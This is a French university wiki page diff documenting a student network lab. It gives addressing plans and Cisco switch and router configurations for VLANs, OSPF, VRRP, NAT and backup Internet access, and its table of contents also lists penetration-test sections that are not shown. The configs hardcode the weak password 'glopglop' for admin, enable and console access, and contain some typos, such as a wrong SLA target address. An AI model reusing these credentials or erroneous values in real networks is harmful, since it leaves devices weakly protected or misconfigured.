TP sysres IMA2a5 2021/2022 G4 : Différence entre versions

De Wiki d'activités IMA
(Résumé des séances)
 
(12 révisions intermédiaires par le même utilisateur non affichées)
Ligne 2 : Ligne 2 :
  
 
{| class="wikitable"
 
{| class="wikitable"
! Groupe !! Domaine !! Nom VM !! Distribution !! IPv4 routée !! VLAN privé !! Réseau local IPv4 !! Réseau IPv6 !! Réseau IPv6 de secours !! Cisco 6509-E !! Cisco 9200 !! SSID n°1 !! SSID n°2
+
! Groupe !! Domaine !! Nom VM !! Distribution !! IPv4 routée !! VLAN privé !! Réseau local IPv4 !! Réseau IPv6 !! Réseau IPv6 de secours !! Cisco 6509-E !! Cisco 9200 !! N° VRRP !! SSID n°1 !! SSID n°2
 
|-
 
|-
 
| Groupe 4
 
| Groupe 4
Ligne 15 : Ligne 15 :
 
| 10.60.164.254
 
| 10.60.164.254
 
| 10.60.164.253
 
| 10.60.164.253
 +
| 64
 
| DEMINEUR1
 
| DEMINEUR1
 
| DEMINEUR2
 
| DEMINEUR2
 
|}
 
|}
  
=Plan d'adressage=
+
=Repository Github=
 +
[https://github.com/kevin-doolaeghe/se2a5_tp_reseau Lien vers le repository Github]
  
* Présentation des VLANs:
+
= Sommaire =
{| class="vlan"
+
 
! VLAN !! Nom !! Réseau
+
* [[#plan-dadressage|Plan d’adressage]]
 +
* [[#architecture-réseau|Architecture réseau]]
 +
* [[#configuration-des-équipements-réseau|Configuration des équipements réseau]]
 +
** [[#configuration-de-base|Configuration de base]]
 +
** [[#configuration-du-vlan-110|Configuration du VLAN 110]]
 +
** [[#configuration-du-vlan-530|Configuration du VLAN 530]]
 +
** [[#paramétrage-du-routage-ipv4-ospf|Paramétrage du routage IPv4 OSPF]]
 +
** [[#redondance-des-routeurs-via-le-protocole-vrrp|Redondance des routeurs via le protocole VRRP]]
 +
** [[#translation-nat-statique|Translation NAT statique]]
 +
** [[#configuration-de-laccès-internet-de-secours|Configuration de l’accès Internet de secours]]
 +
** [[#paramétrage-ipv6|Paramétrage IPv6]]
 +
** [[#configuration-du-vlan-164|Configuration du VLAN 164]]
 +
** [[#configuration-des-points-daccès-wifi|Configuration des points d’accès Wifi]]
 +
* [[#machine-virtuelle-sur-le-serveur-capbreton|Machine virtuelle sur le serveur Capbreton]]
 +
** [[#création-de-la-machine-virtuelle|Création de la machine virtuelle]]
 +
** [[#serveur-ssh|Serveur SSH]]
 +
** [[#configuration-ip|Configuration IP]]
 +
** [[#serveur-dns|Serveur DNS]]
 +
** [[#serveur-web|Serveur Web]]
 +
** [[#configuration-dnssec|Configuration DNSSEC]]
 +
** [[#configuration-du-serveur-radius|Configuration du serveur RADIUS]]
 +
** [[#configuration-de-squid-serveur-mandataire|Configuration de Squid (serveur mandataire)]]
 +
** [[#sécurisation-des-données|Sécurisation des données]]
 +
** [[#chiffrement-des-données|Chiffrement des données]]
 +
** [[#ferme-de-serveurs-web|Ferme de serveurs Web]]
 +
* [[#tests-dintrusion|Tests d’intrusion]]
 +
** [[#cassage-de-clef-wep-dun-point-daccès-wifi|Cassage de clef WEP d’un point d’accès Wifi]]
 +
** [[#cassage-du-mot-de-passe-wpa-psk-par-force-brute|Cassage du mot de passe WPA-PSK par force brute]]
 +
** [[#attaque-du-type-homme-du-milieu-par-usurpation-arp|Attaque du type “homme du milieu” par usurpation ARP]]
 +
** [[#intrusion-sur-un-serveur-web|Intrusion sur un serveur Web]]
 +
* [[#résumé-des-séances|Résumé des séances]]
 +
 
 +
= Plan d’adressage =
 +
 
 +
* Répartition des réseaux :
 +
 
 +
{|
 +
!width="9%"| Groupe
 +
!width="9%"| Élève
 +
!width="9%"| Domaine
 +
!width="9%"| 193.48.57.160/28
 +
!width="9%"| 10.60.0.0/16
 +
!width="9%"| 2001:660:4401:60A0::/60
 +
!width="9%"| 2001:7A8:116E:60A0::/60
 +
!width="9%"| VLAN
 +
!width="9%"| N° VRRP
 +
!width="9%"| SSID n°1
 +
!width="9%"| SSID n°2
 +
|-
 +
| 1
 +
| Basile.Cougnacq
 +
| barbiegirl.store
 +
| 193.48.57.161
 +
| 10.60.161.0/24
 +
| 2001:660:4401:60A1::/64
 +
| 2001:7A8:116E:60A1::/64
 +
| 161
 +
| 61
 +
| BG1
 +
| BG2
 +
|-
 +
| 2
 +
| Benoit.Bouckaert
 +
| zelda-botw.site
 +
| 193.48.57.162
 +
| 10.60.162.0/24
 +
| 2001:660:4401:60A2::/64
 +
| 2001:7A8:116E:60A2::/64
 +
| 162
 +
| 62
 +
| ZELDA_BOTW_1
 +
| ZELDA_BOTW_2
 +
|-
 +
| 3
 +
| God-Belange.Aradukunda
 +
| humankind59.site
 +
| 193.48.57.163
 +
| 10.60.163.0/2
 +
| 2001:660:4401:60A3::/64
 +
| 2001:7A8:116E:60A3::/64
 +
| 163
 +
| 63
 +
| Humankind1
 +
| Humankind2
 +
|-
 +
| 4
 +
| Kevin.Doolaeghe
 +
| demineur.site
 +
| 193.48.57.164
 +
| 10.60.164.0/24
 +
| 2001:660:4401:60A4::/64
 +
| 2001:7A8:116E:60A4::/64
 +
| 164
 +
| 64
 +
| DEMINEUR1
 +
| DEMINEUR2
 +
|-
 +
| 5
 +
| Lea.Viciot
 +
| animal-crossing.site
 +
| 193.48.57.165
 +
| 10.60.165.0/24
 +
| 2001:660:4401:60A5::/64
 +
| 2001:7A8:116E:60A5::/64
 +
| 165
 +
| 65
 +
| AnimalCrossing1
 +
| AnimalCrossing2
 +
|-
 +
| 6
 +
| Nicolas.Erceau
 +
| rocketleague.club
 +
| 193.48.57.166
 +
| 10.60.166.0/24
 +
| 2001:660:4401:60A6::/64
 +
| 2001:7A8:116E:60A6::/64
 +
| 166
 +
| 66
 +
| Rocket-League-1
 +
| Rocket-League-2
 +
|-
 +
| 7
 +
| Quentin.Lemaire
 +
| gta59.site
 +
| 193.48.57.167
 +
| 10.60.167.0/24
 +
| 2001:660:4401:60A7::/64
 +
| 2001:7A8:116E:60A7::/64
 +
| 167
 +
| 67
 +
| GTA1
 +
| GTA2
 +
|-
 +
| 8
 +
| Quentin.Maesen
 +
| fifa59.site
 +
| 193.48.57.168
 +
| 10.60.168.0/24
 +
| 2001:660:4401:60A8::/64
 +
| 2001:7A8:116E:60A8::/64
 +
| 168
 +
| 68
 +
| Fifa1
 +
| Fifa2
 +
|-
 +
| 9
 +
| Romain.Haye
 +
| brawl-stars.club
 +
| 193.48.57.169
 +
| 10.60.169.0/24
 +
| 2001:660:4401:60A9::/64
 +
| 2001:7A8:116E:60A9::/64
 +
| 169
 +
| 69
 +
| Brawl-Stars-1
 +
| Brawl-Stars-2
 +
|-
 +
| 10
 +
| Thomas.Obled
 +
| warzone59.site
 +
| 193.48.57.170
 +
| 10.60.170.0/24
 +
| 2001:660:4401:60AA::/64
 +
| 2001:7A8:116E:60AA::/64
 +
| 170
 +
| 70
 +
| WARZONE1
 +
| WARZONE2
 +
|-
 +
| 11
 +
| Valentin.Harlet
 +
| mario59.site
 +
| 193.48.57.171
 +
| 10.60.171.0/24
 +
| 2001:660:4401:60AB::/64
 +
| 2001:7A8:116E:60AB::/64
 +
| 171
 +
| 71
 +
| Mario1
 +
| Mario2
 +
|-
 +
| 12
 +
| William.Meslard
 +
| bffield.store
 +
| 193.48.57.172
 +
| 10.60.172.0/24
 +
| 2001:660:4401:60AC::/64
 +
| 2001:7A8:116E:60AC::/64
 +
| 172
 +
| 72
 +
| BATTLEFIELD1
 +
| BATTLEFIELD2
 +
|-
 +
| 13
 +
| Yasmine.Haloua
 +
| toad59.site
 +
| 193.48.57.173
 +
| 10.60.173.0/24
 +
| 2001:660:4401:60AD::/64
 +
| 2001:7A8:116E:60AD::/64
 +
| 173
 +
| 73
 +
| Toad1
 +
| Toad2
 +
|}
 +
 
 +
* Plan d’adressage IPv4 :
 +
 
 +
{|
 +
!width="14%"| VLAN
 +
!width="14%"| Nom
 +
!width="14%"| Réseau IPv4
 +
!width="14%"| Cisco 6509-E
 +
!width="14%"| Cisco 9200
 +
!width="14%"| Cisco ISR 4331
 +
!width="14%"| Routeur plateforme maths/info
 
|-
 
|-
 
| 110
 
| 110
 
| TP-NET1
 
| TP-NET1
 
| 193.48.57.160/28 / 10.60.100.0/24 (local)
 
| 193.48.57.160/28 / 10.60.100.0/24 (local)
 +
| 10.60.100.1
 +
| 10.60.100.2
 +
| 10.60.100.3
 +
| -
 
|-
 
|-
 
| 530
 
| 530
 
| INTERCO-4A
 
| INTERCO-4A
| 192.168.222.32/29
+
| 192.168.222.64/28
 +
| 192.168.222.66
 +
| 192.168.222.67
 +
| -
 +
| 192.168.222.65
 
|-
 
|-
 
| 532
 
| 532
 
| INTERCO-1B
 
| INTERCO-1B
| 192.168.222.48/29
+
| 192.168.222.80/28
 +
| -
 +
| -
 +
| 192.168.222.82
 +
| 192.168.222.81
 +
|-
 +
| 161
 +
| BarbieGirl
 +
| 10.60.161.0/24
 +
| 10.60.161.1
 +
| 10.60.161.2
 +
| -
 +
| -
 +
|-
 +
| 162
 +
| Zelda-BOTW
 +
| 10.60.162.0/24
 +
| 10.60.162.1
 +
| 10.60.162.2
 +
| -
 +
| -
 +
|-
 +
| 163
 +
| Humankind
 +
| 10.60.163.0/24
 +
| 10.60.163.1
 +
| 10.60.163.2
 +
| -
 +
| -
 
|-
 
|-
 
| 164
 
| 164
| NET-GP4
+
| DEMINEUR
 
| 10.60.164.0/24
 
| 10.60.164.0/24
 +
| 10.60.164.1
 +
| 10.60.164.2
 +
| -
 +
| -
 +
|-
 +
| 165
 +
| AnimalCrossing
 +
| 10.60.165.0/24
 +
| 10.60.165.1
 +
| 10.60.165.2
 +
| -
 +
| -
 +
|-
 +
| 166
 +
| Rocket-League
 +
| 10.60.166.0/24
 +
| 10.60.166.1
 +
| 10.60.166.2
 +
| -
 +
| -
 +
|-
 +
| 167
 +
| GTA
 +
| 10.60.167.0/24
 +
| 10.60.167.1
 +
| 10.60.167.2
 +
| -
 +
| -
 +
|-
 +
| 168
 +
| Fifa
 +
| 10.60.168.0/24
 +
| 10.60.168.1
 +
| 10.60.168.2
 +
| -
 +
| -
 +
|-
 +
| 169
 +
| Brawl-Stars
 +
| 10.60.169.0/24
 +
| 10.60.169.1
 +
| 10.60.169.2
 +
| -
 +
| -
 +
|-
 +
| 170
 +
| Warzone
 +
| 10.60.170.0/24
 +
| 10.60.170.1
 +
| 10.60.170.2
 +
| -
 +
| -
 +
|-
 +
| 171
 +
| Mario
 +
| 10.60.171.0/24
 +
| 10.60.171.1
 +
| 10.60.171.2
 +
| -
 +
| -
 +
|-
 +
| 172
 +
| Battlefield
 +
| 10.60.172.0/24
 +
| 10.60.172.1
 +
| 10.60.172.2
 +
| -
 +
| -
 +
|-
 +
| 173
 +
| Toad
 +
| 10.60.173.0/24
 +
| 10.60.173.1
 +
| 10.60.173.2
 +
| -
 +
| -
 
|}
 
|}
  
* Plan d'adressage:
+
* Plan d’adressage IPv6 :
[[Fichier:kde_plan_adr.jpg]]
+
 
 +
{|
 +
!width="14%"| VLAN
 +
!width="14%"| Nom
 +
!width="14%"| Réseau IPv6
 +
!width="14%"| Cisco 6509-E
 +
!width="14%"| Cisco 9200
 +
!width="14%"| Cisco ISR 4331
 +
!width="14%"| Routeur plateforme maths/info
 +
|-
 +
| 110
 +
| TP-NET1
 +
| 2001:660:4401:60A0::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 530
 +
| INTERCO-4A
 +
| FE80::/10
 +
| FE80::2
 +
| FE80::3
 +
| -
 +
| FE80::1
 +
|-
 +
| 532
 +
| INTERCO-1B
 +
| FE80::/10
 +
| -
 +
| -
 +
| FE80::2
 +
| FE80::1
 +
|-
 +
| 161
 +
| BarbieGirl
 +
| 2001:660:4401:60A1::/64 / 2001:7A8:116E:60A1::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 162
 +
| Zelda-BOTW
 +
| 2001:660:4401:60A2::/64 / 2001:7A8:116E:60A2::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 163
 +
| Humankind
 +
| 2001:660:4401:60A3::/64 / 2001:7A8:116E:60A3::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 164
 +
| DEMINEUR
 +
| 2001:660:4401:60A4::/64 / 2001:7A8:116E:60A4::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 165
 +
| AnimalCrossing
 +
| 2001:660:4401:60A5::/64 / 2001:7A8:116E:60A5::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 166
 +
| Rocket-League
 +
| 2001:660:4401:60A6::/64 / 2001:7A8:116E:60A6::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 167
 +
| GTA
 +
| 2001:660:4401:60A7::/64 / 2001:7A8:116E:60A7::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 168
 +
| Fifa
 +
| 2001:660:4401:60A8::/64 / 2001:7A8:116E:60A8::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 169
 +
| Brawl-Stars
 +
| 2001:660:4401:60A9::/64 / 2001:7A8:116E:60A9::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 170
 +
| Warzone
 +
| 2001:660:4401:60AA::/64 / 2001:7A8:116E:60AA::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 171
 +
| Mario
 +
| 2001:660:4401:60AB::/64 / 2001:7A8:116E:60AB::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 172
 +
| Battlefield
 +
| 2001:660:4401:60AC::/64 / 2001:7A8:116E:60AC::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|-
 +
| 173
 +
| Toad
 +
| 2001:660:4401:60AD::/64 / 2001:7A8:116E:60AD::/64
 +
| -
 +
| -
 +
| -
 +
| -
 +
|}
 +
 
 +
= Architecture réseau =
 +
 
 +
* Architecture logique :
 +
 
 +
[[File:architecture_logique.jpg|frame|none|alt=|caption architecture_logique.jpg]]
 +
 
 +
* Architecture physique :
 +
 
 +
[[File:architecture_physique.jpg|frame|none|alt=|caption architecture_physique.jpg]]
 +
 
 +
= Configuration des équipements réseau =
 +
 
 +
== Configuration de base ==
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
<pre>switch&gt;enable
 +
switch#configure terminal</pre>
 +
* Configuration du nom d’hôte :
 +
 
 +
<pre>switch(config)#hostname SE2A5-R1</pre>
 +
* Accès SSH :
 +
 
 +
<pre>SE2A5-R1(config)#aaa new-model
 +
SE2A5-R1(config)#username admin privilege 15 secret glopglop
 +
SE2A5-R1(config)#ip domain-name plil.info
 +
SE2A5-R1(config)#crypto key generate rsa
 +
SE2A5-R1(config)#line vty 0 15
 +
SE2A5-R1(config-line)#transport input ssh
 +
SE2A5-R1(config-line)#exit</pre>
 +
* Accès console :
 +
 
 +
<pre>SE2A5-R1(config)#line console 0
 +
SE2A5-R1(config-line)#password glopglop
 +
SE2A5-R1(config-line)#login authentification default
 +
SE2A5-R1(config-line)#exit</pre>
 +
* Sécurisation des accès :
 +
 
 +
<pre>SE2A5-R1(config)#service password-encryption
 +
SE2A5-R1(config)#enable secret glopglop
 +
SE2A5-R1(config)#banner motd #Restricted Access#</pre>
 +
* Activer le routage :
 +
 
 +
<pre>SE2A5-R1(config)#ip routing</pre>
 +
* Activer VRRP :
 +
 
 +
<pre>SE2A5-R1(config)#license boot level network-advantage
 +
SE2A5-R1(config)#fhrp version vrrp v3</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
<pre>switch&gt;enable
 +
switch#configure terminal</pre>
 +
* Configuration du nom d’hôte :
 +
 
 +
<pre>switch(config)#hostname SE2A5-R2</pre>
 +
* Accès SSH :
 +
 
 +
<pre>SE2A5-R2(config)#aaa new-model
 +
SE2A5-R2(config)#username admin privilege 15 secret glopglop
 +
SE2A5-R2(config)#ip domain-name plil.info
 +
SE2A5-R2(config)#crypto key generate rsa
 +
SE2A5-R2(config)#line vty 0 15
 +
SE2A5-R2(config-line)#transport input ssh
 +
SE2A5-R2(config-line)#exit</pre>
 +
* Accès console :
 +
 
 +
<pre>SE2A5-R2(config)#line console 0
 +
SE2A5-R2(config-line)#password glopglop
 +
SE2A5-R2(config-line)#login authentification default
 +
SE2A5-R2(config-line)#exit</pre>
 +
* Sécurisation des accès :
 +
 
 +
<pre>SE2A5-R2(config)#service password-encryption
 +
SE2A5-R2(config)#enable secret glopglop
 +
SE2A5-R2(config)#banner motd #Restricted Access#</pre>
 +
* Activer le routage :
 +
 
 +
<pre>SE2A5-R2(config)#ip routing</pre>
 +
* Activer VRRP :
 +
 
 +
<pre>SE2A5-R2(config)#license boot level network-advantage
 +
SE2A5-R2(config)#fhrp version vrrp v3</pre>
 +
== Configuration du VLAN 110 ==
 +
 
 +
Le VLAN 110 permet un accès à un réseau IPv4 routé.<br />
 +
Le réseau privé <code>10.60.0.0/16</code> est également utilisé sur ce réseau pour les points d’accès Wifi et les configurations IP des routeurs.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R1(config)#vlan 110
 +
SE2A5-R1(config-vlan)#name TP-NET1
 +
SE2A5-R1(config-vlan)#exit
 +
SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#description TP-NET1
 +
SE2A5-R1(config-if)#ip address 10.60.100.1 255.255.255.0
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
* Interface vers serveur Capbreton :
 +
 
 +
<pre>SE2A5-R1(config)#interface t6/4
 +
SE2A5-R1(config-if)#switchport
 +
SE2A5-R1(config-if)#switchport mode access
 +
SE2A5-R1(config-if)#switchport access vlan 110
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R2(config)#vlan 110
 +
SE2A5-R2(config-vlan)#name TP-NET1
 +
SE2A5-R2(config-vlan)#exit
 +
SE2A5-R2(config)#interface vlan 110
 +
SE2A5-R2(config-if)#description TP-NET1
 +
SE2A5-R2(config-if)#ip address 10.60.100.2 255.255.255.0
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#exit</pre>
 +
* Interface vers serveur Capbreton :
 +
 
 +
<pre>SE2A5-R2(config)#interface t1/1/1
 +
SE2A5-R2(config-if)#switchport
 +
SE2A5-R2(config-if)#switchport mode access
 +
SE2A5-R2(config-if)#switchport access vlan 110
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#exit</pre>
 +
== Configuration du VLAN 530 ==
 +
 
 +
Le VLAN 530 permet l’interconnexion avec les routeurs de la plateforme maths/info.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* VLAN 530 :
 +
 
 +
<pre>SE2A5-R1(config)#vlan 530
 +
SE2A5-R1(config-vlan)#name INTERCO-4A
 +
SE2A5-R1(config-vlan)#exit
 +
SE2A5-R1(config)#interface vlan 530
 +
SE2A5-R1(config-if)#description INTERCO-4A
 +
SE2A5-R1(config-if)#ip address 192.168.222.66 255.255.255.248
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
* Interface d’interconnexion :
 +
 
 +
<pre>SE2A5-R1(config)#interface t6/5
 +
SE2A5-R1(config-if)#switchport
 +
SE2A5-R1(config-if)#switchport mode access
 +
SE2A5-R1(config-if)#switchport access vlan 530
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* VLAN 530 :
 +
 
 +
<pre>SE2A5-R2(config)#vlan 530
 +
SE2A5-R2(config-vlan)#name INTERCO-4A
 +
SE2A5-R2(config-vlan)#exit
 +
SE2A5-R2(config)#interface vlan 530
 +
SE2A5-R2(config-if)#description INTERCO-4A
 +
SE2A5-R2(config-if)#ip address 192.168.222.67 255.255.255.248
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#exit</pre>
 +
* Interface d’interconnexion :
 +
 
 +
<pre>SE2A5-R2(config)#interface g1/0/1
 +
SE2A5-R2(config-if)#switchport
 +
SE2A5-R2(config-if)#switchport mode access
 +
SE2A5-R2(config-if)#switchport access vlan 530
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#exit</pre>
 +
== Paramétrage du routage IPv4 OSPF ==
 +
 
 +
Le protocole de routage OSPF est utilisé sur le VLAN 530 afin de déterminer quel routeur aura le rôle de maître pour le routage des paquets et l’annonce des routes.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* Routage IPv4 - Protocole OPSF :
 +
 
 +
<pre>SE2A5-R1(config)#router ospf 1
 +
SE2A5-R1(config-router)#router-id 192.168.222.66
 +
SE2A5-R1(config-router)#summary-address 193.48.57.160 255.255.255.240
 +
SE2A5-R1(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
 +
SE2A5-R1(config-router)#redistribute connected subnets metric 1
 +
SE2A5-R1(config-router)#redistribute static subnets metric 1
 +
SE2A5-R1(config-router)#network 192.168.222.64 0.0.0.7 area 10
 +
SE2A5-R1(config-router)#default-information originate
 +
SE2A5-R1(config-router)#exit</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* Routage IPv4 - Protocole OPSF :
 +
 
 +
<pre>SE2A5-R2(config)#router ospf 1
 +
SE2A5-R2(config-router)#router-id 192.168.222.67
 +
SE2A5-R2(config-router)#summary-address 193.48.57.160 255.255.255.240
 +
SE2A5-R2(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
 +
SE2A5-R2(config-router)#redistribute connected subnets metric 2
 +
SE2A5-R2(config-router)#redistribute static subnets metric 2
 +
SE2A5-R2(config-router)#network 192.168.222.64 0.0.0.7 area 10
 +
SE2A5-R2(config-router)#default-information originate
 +
SE2A5-R2(config-router)#exit</pre>
 +
Le routeur Cisco Catalyst 9200 a une métrique plus élevée afin d’être le routeur secondaire sur le réseau.
 +
 
 +
== Redondance des routeurs via le protocole VRRP ==
 +
 
 +
Le protocole de redondance VRRP est utilisé pour déterminer quel routeur doit avoir le rôle de maître sur le VLAN 110.<br />
 +
Le routeur Cisco Catalyst 6509-E a une métrique inférieure à celle du Cisco Catalyst 9200 afin qu’il soit le routeur maître sur le réseau.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#vrrp 10 ip 10.60.100.254
 +
SE2A5-R1(config-if)#vrrp 10 preempt
 +
SE2A5-R1(config-if)#vrrp 10 priority 110
 +
SE2A5-R1(config-if)#exit</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* VLAN 110 :
 +
 
 +
<pre>SE2A5-R2(config)#interface vlan 110
 +
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
 +
SE2A5-R2(config-if-vrrp)#address 10.60.100.254
 +
SE2A5-R2(config-if-vrrp)#vrrpv2
 +
SE2A5-R2(config-if-vrrp)#priority 100
 +
SE2A5-R2(config-if-vrrp)#preempt
 +
SE2A5-R2(config-if-vrrp)#exit
 +
SE2A5-R2(config-if)#exit</pre>
 +
La version 3 du protocole VRRP n’est pas disponible sur le routeur Cisco Catalyst 6509-E.<br />
 +
Cependant, le routeur Cisco Catalyst 9200 utilise cette version par défaut.<br />
 +
La commande <code>vrrpv2</code> est donc nécessaire afin d’utiliser la version 2 du protocole VRRP.
 +
 
 +
== Translation NAT statique ==
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* Configuration NAT :
 +
 
 +
<pre>SE2A5-R1(config)#interface vlan 530
 +
SE2A5-R1(config-if)#ip nat outside
 +
SE2A5-R1(config-if)#exit
 +
SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#ip nat inside
 +
SE2A5-R1(config-if)#exit
 +
SE2A5-R1(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28</pre>
 +
* Redistribution via OSPF à partir de l’interface Loopback 0 :
 +
 
 +
<pre>SE2A5-R1(config)#interface loopback 0
 +
SE2A5-R1(config-if)#ip address 193.48.57.174 255.255.255.240
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
Les VM doivent avoir une configuration IP sur le réseau <code>193.48.57.160/28</code>.<br />
 +
La communication fonctionne désormais sauf pour les paquets UDP qui sont filtrés.
 +
 
 +
On choisit de désactiver l’interface <code>l0</code> pour économiser une adresse routée.<br />
 +
A la place, on passe par l’interface <code>null0</code> :
 +
 
 +
<pre>SE2A5-R1(config)#interface loopback 0
 +
SE2A5-R1(config-if)#shutdown
 +
SE2A5-R1(config-if)#exit
 +
SE2A5-R1(config)#ip route 193.48.57.160 255.255.255.240 null0</pre>
 +
Une solution de contournement serait d’utiliser des routes statiques comme pour le routeur Cisco Catalyst 9200 (voir ci-dessous).
 +
 
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
Comme le Cisco Catalyst 9200 ne prend pas en charge le protocole NAT, on utilise des routes statiques :
 +
 
 +
<pre>SE2A5-R2(config)#ip route 193.48.57.161 255.255.255.255 10.60.100.161
 +
SE2A5-R2(config)#ip route 193.48.57.162 255.255.255.255 10.60.100.162
 +
SE2A5-R2(config)#ip route 193.48.57.163 255.255.255.255 10.60.100.163
 +
SE2A5-R2(config)#ip route 193.48.57.164 255.255.255.255 10.60.100.164
 +
SE2A5-R2(config)#ip route 193.48.57.165 255.255.255.255 10.60.100.165
 +
SE2A5-R2(config)#ip route 193.48.57.166 255.255.255.255 10.60.100.166
 +
SE2A5-R2(config)#ip route 193.48.57.167 255.255.255.255 10.60.100.167
 +
SE2A5-R2(config)#ip route 193.48.57.168 255.255.255.255 10.60.100.168
 +
SE2A5-R2(config)#ip route 193.48.57.169 255.255.255.255 10.60.100.169
 +
SE2A5-R2(config)#ip route 193.48.57.170 255.255.255.255 10.60.100.170
 +
SE2A5-R2(config)#ip route 193.48.57.171 255.255.255.255 10.60.100.171
 +
SE2A5-R2(config)#ip route 193.48.57.172 255.255.255.255 10.60.100.172
 +
SE2A5-R2(config)#ip route 193.48.57.173 255.255.255.255 10.60.100.173</pre>
 +
Cette solution est fonctionnelle mais impose que les VM aient une configuration IP sur le réseau <code>10.60.100.160/28</code>.<br />
 +
Les VM devront donc avoir une configuration IP avec l’adresse locale et celle routée.
 +
 
 +
== Configuration de l’accès Internet de secours ==
 +
 
 +
La liaison entre les routeurs déjà présents et le routeur Cisco ISR 4331 est configurée en mode trunk (802.1q).<br />
 +
On ajoute une règle SLA afin de tester la réponse du routeur de la plateforme maths/info situé en amont.<br />
 +
Si le routeur ne répond pas, on décrémente la métrique des routeurs sur le VLAN 110 afin que le routeur ISR 4331 devienne prioritaire.
 +
 
 +
===   → '''Cisco Catalyst 6509-E''' ===
 +
 
 +
* Interface vers Cisco ISR 4331 :
 +
 
 +
<pre>SE2A5-R1(config)#interface t5/5
 +
SE2A5-R1(config-if)#switchport
 +
SE2A5-R1(config-if)#switchport mode trunk
 +
SE2A5-R1(config-if)#switchport trunk allowed vlan 110
 +
SE2A5-R1(config-if)#no shutdown
 +
SE2A5-R1(config-if)#exit</pre>
 +
* SLA :
 +
 
 +
<pre>SE2A5-R1(config)#ip sla 1
 +
SE2A5-R1(config-ip-sla)#icmp-echo 192.168.222.65
 +
SE2A5-R1(config-ip-sla-echo)#frequency 300
 +
SE2A5-R1(config-ip-sla-echo)#exit
 +
SE2A5-R1(config)#ip sla schedule 1 life forever start-time now
 +
SE2A5-R1(config)#track 1 ip sla 1
 +
SE2A5-R1(config-track)#exit
 +
SE2A5-R1(config)#interface vlan 110
 +
SE2A5-R1(config-if)#vrrp 10 track 1 decrement 50
 +
SE2A5-R1(config-if)#exit</pre>
 +
===   → '''Cisco Catalyst 9200''' ===
 +
 
 +
* Interface vers Cisco ISR 4331 :
 +
 
 +
<pre>SE2A5-R2(config)#interface g1/0/2
 +
SE2A5-R2(config-if)#switchport
 +
SE2A5-R2(config-if)#switchport mode trunk
 +
SE2A5-R2(config-if)#switchport trunk allowed vlan 110
 +
SE2A5-R2(config-if)#no shutdown
 +
SE2A5-R2(config-if)#exit</pre>
 +
* SLA :
 +
 
 +
<pre>SE2A5-R2(config)#ip sla 1
 +
SE2A5-R2(config-ip-sla)#icmp-echo 192.166.222.65
 +
SE2A5-R2(config-ip-sla-echo)#frequency 300
 +
SE2A5-R2(config-ip-sla-echo)#exit
 +
SE2A5-R2(config)#ip sla schedule 1 life forever start-time now
 +
SE2A5-R2(config)#track 1 ip sla 1
 +
SE2A5-R2(config-track)#exit
 +
SE2A5-R2(config)#interface vlan 110
 +
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
 +
SE2A5-R2(config-if-vrrp)#track 1 decrement 50
 +
SE2A5-R2(config-if-vrrp)#exit
 +
SE2A5-R2(config-if)#exit</pre>
 +
===   → '''Cisco ISR 4331''' ===
 +
 
 +
====       '''Configuration de base :''' ====
 +
 
 +
<pre>switch&gt;enable
 +
switch#configure terminal</pre>
 +
* Configuration du nom d’hôte :
 +
 
 +
<pre>switch(config)#hostname SE2A5-R3</pre>
 +
* Accès SSH :
 +
 
 +
<pre>SE2A5-R3(config)#aaa new-model
 +
SE2A5-R3(config)#username admin privilege 15 secret glopglop
 +
SE2A5-R3(config)#ip domain-name plil.info
 +
